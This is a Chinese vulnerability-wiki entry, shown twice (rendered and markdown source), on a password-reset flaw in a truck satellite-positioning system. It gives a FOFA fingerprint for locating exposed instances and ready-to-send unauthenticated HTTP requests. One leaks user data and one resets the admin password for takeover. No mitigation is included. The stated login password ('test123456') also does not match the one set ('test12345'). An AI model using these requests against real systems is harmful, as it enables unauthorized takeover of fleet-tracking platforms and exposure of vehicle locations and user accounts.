fofamini-wiki

登录白背景

源码

卡车卫星定位系统存在密码重置漏洞

一、漏洞简介

卡车卫星定位系统是一种基于卫星通信和导航技术的系统，用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间，可以确定接收器（即卡车上的定位设备）所在的位置。卡车卫星定位系统存在密码重置漏洞，攻击者可通过该漏洞重置管理员密码获取应用系统权限。

二、影响版本

卡车卫星定位系统

三、资产测绘

fofaicon_hash="1553867732"
特征

四、漏洞复现

未授权获取用户信息

GET /user/1 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

未授权重置用户密码

POST /user/create HTTP/1.1
Host: 
Content-Length: 216
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113}
Connection: close

account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=

使用admin/test123456成功登录系统

原文: https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz

# 卡车卫星定位系统存在密码重置漏洞

# 一、漏洞简介
卡车卫星定位系统是一种基于卫星通信和导航技术的系统，用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间，可以确定接收器（即卡车上的定位设备）所在的位置。卡车卫星定位系统存在密码重置漏洞，攻击者可通过该漏洞重置管理员密码获取应用系统权限。

# 二、影响版本

- 卡车卫星定位系统

# 三、资产测绘

- fofa`icon_hash="1553867732"`
- 特征

![image.png](./img/DjYibcHeiH4_N4z4/1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec-652470.png)

# 四、漏洞复现
未授权获取用户信息
```
GET /user/1 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
![image.png](./img/DjYibcHeiH4_N4z4/1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0-093980.png)
未授权重置用户密码
```
POST /user/create HTTP/1.1
Host: 
Content-Length: 216
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113}
Connection: close

account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=
```
![image.png](./img/DjYibcHeiH4_N4z4/1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c-902179.png)
使用`admin/test123456`成功登录系统
![image.png](./img/DjYibcHeiH4_N4z4/1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6-489598.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz>